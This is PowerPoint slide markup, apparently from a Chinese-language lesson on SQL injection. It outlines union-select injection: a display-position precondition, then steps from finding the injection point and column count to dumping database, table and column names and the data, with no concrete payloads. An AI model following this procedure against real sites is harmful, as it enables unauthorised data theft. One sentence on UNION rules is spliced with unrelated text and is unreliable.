            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="1483668"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>联合查询注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DDF64FD-D469-4CC9-BEDB-6250BB5A90A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668225" y="2095998"/>
            <a:ext cx="3994639" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前提条件：页面上有显示位</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B804C570-33A4-43EB-9E8F-1ADF8CAA1D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4752630" y="1927748"/>
            <a:ext cx="6598239" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在一个在一个网站的正常页面，服务端执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句查询数据库中的数据，客户端将数据展示在页面中，这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>展示数据的位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就叫显示位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14497A2A-59AE-4BFD-BC14-574301E109FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391775" y="2725434"/>
            <a:ext cx="2415592" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一般步骤：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D48656AD-E826-4D7F-AF5F-7524846E2B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709630" y="4549440"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>③ 判断显示位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC4A9944-862D-49CF-9496-3301703DFAD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069420" y="3225346"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>⑤ 爆表名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B55C29-7C7E-4371-AAF4-3B685B0F0876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069419" y="3884120"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>⑥ 爆列名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85440AC6-413E-4A6B-A1A4-49E87477C69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069419" y="4511408"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>⑦ 爆数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39563446-4ABB-4D09-8B93-4EEC6E2CA312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668225" y="3225346"/>
            <a:ext cx="5666865" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>① 判断是否存在注入点，注入点的类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C5547C7-2455-46E1-BE7C-0C72762DCCFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693968" y="3884121"/>
            <a:ext cx="4226798" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>② 判断查询的列数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78236F93-668D-4134-BED0-E4A2DA886E9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709630" y="5229158"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>④ 爆数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3139647671"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586978" y="483800"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
